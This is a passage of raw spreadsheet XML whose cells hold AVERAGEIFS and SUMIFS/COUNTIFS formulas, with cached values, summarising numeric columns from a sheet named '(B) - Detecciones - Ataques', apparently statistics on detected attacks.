        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>6</v>
      </c>
      <c r="AV154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>2</v>
      </c>
      <c r="AW154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1.6875</v>
      </c>
      <c r="AY154" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>1.5</v>
      </c>
      <c r="BA154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>14</v>
      </c>
      <c r="BB154" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>16484.33333</v>
      </c>
      <c r="BD154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="BF154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>1.5</v>
      </c>
      <c r="BG154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="BH154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>396</v>
      </c>
      <c r="BI154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>2</v>
      </c>
      <c r="BM154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>15459.55935</v>
      </c>
      <c r="BN154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>1060.641673</v>
      </c>
      <c r="BO154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1.004901961</v>
      </c>
      <c r="BR154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>5</v>
      </c>
      <c r="BT154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>4</v>
      </c>
      <c r="BX154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>2.6875</v>
      </c>
      <c r="BZ154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1.081300813</v>
      </c>
      <c r="CA154" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC154" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>4</v>
      </c>
      <c r="CG154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>3</v>
      </c>
      <c r="CI154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>33</v>
      </c>
      <c r="CJ154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>13</v>
      </c>
      <c r="CL154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>85.5</v>
      </c>
      <c r="CN154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>3.125</v>
      </c>
      <c r="CP154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>21.5</v>
      </c>
      <c r="CQ154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>3</v>
      </c>
      <c r="CR154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.0622694374</v>
      </c>
      <c r="CT154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.003992015968</v>
      </c>
      <c r="CU154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>1</v>
      </c>
      <c r="CW154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>5</v>
      </c>
      <c r="CY154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>16</v>
      </c>
      <c r="CZ154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1.055555556</v>
      </c>
      <c r="DI154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ154" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.363636364</v>
      </c>
      <c r="DK154" s="271"/>
    </row>
    <row r="155">
      <c r="J155" s="277"/>
      <c r="K155" s="512"/>
      <c r="L155" s="512"/>
      <c r="M155" s="512"/>
      <c r="N155" s="512"/>
      <c r="O155" s="278"/>
      <c r="Q155" s="271"/>
      <c r="R155" s="352" t="s">
        <v>2577</v>
      </c>
      <c r="S155" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>1.315187148</v>
      </c>
      <c r="T155" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.03957039002</v>
      </c>
      <c r="U155" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>2.092105263</v>
      </c>
      <c r="V155" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>8.828125</v>
      </c>
      <c r="W155" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>29</v>
      </c>
      <c r="X155" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>7065.714286</v>
      </c>
      <c r="Y155" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>81.625</v>
      </c>
      <c r="Z155" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>14192.40676</v>
      </c>
      <c r="AA155" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>3.45855406</v>
      </c>
      <c r="AB155" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>30.0390625</v>
      </c>
      <c r="AC155" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>8.25</v>
      </c>
      <c r="AD155" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>3.407670265</v>
      </c>
      <c r="AE155" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>8.92</v>
      </c>
      <c r="AF155" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GL$3:$GL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>8.277124164</v>
      </c>
      <c r="AG155" s="271"/>
      <c r="AH155" s="352" t="s">
        <v>2577</v>
      </c>
      <c r="AI155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>1.380374295</v>
      </c>
      <c r="AJ155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>2.75</v>
      </c>
      <c r="AL155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.03957039002</v>
      </c>
      <c r="AN155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.5842105263</v>
      </c>
      <c r="AR155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>2.5</v>
      </c>
      <c r="AS155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>4</v>
      </c>
      <c r="AU155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>7</v>
      </c>
      <c r="AV155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>2</v>
      </c>
      <c r="AW155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>2.3125</v>
      </c>
      <c r="AY155" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>2</v>
      </c>
      <c r="BA155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>29</v>
      </c>
      <c r="BB155" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>16485</v>
      </c>
      <c r="BD155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE155" s="518">
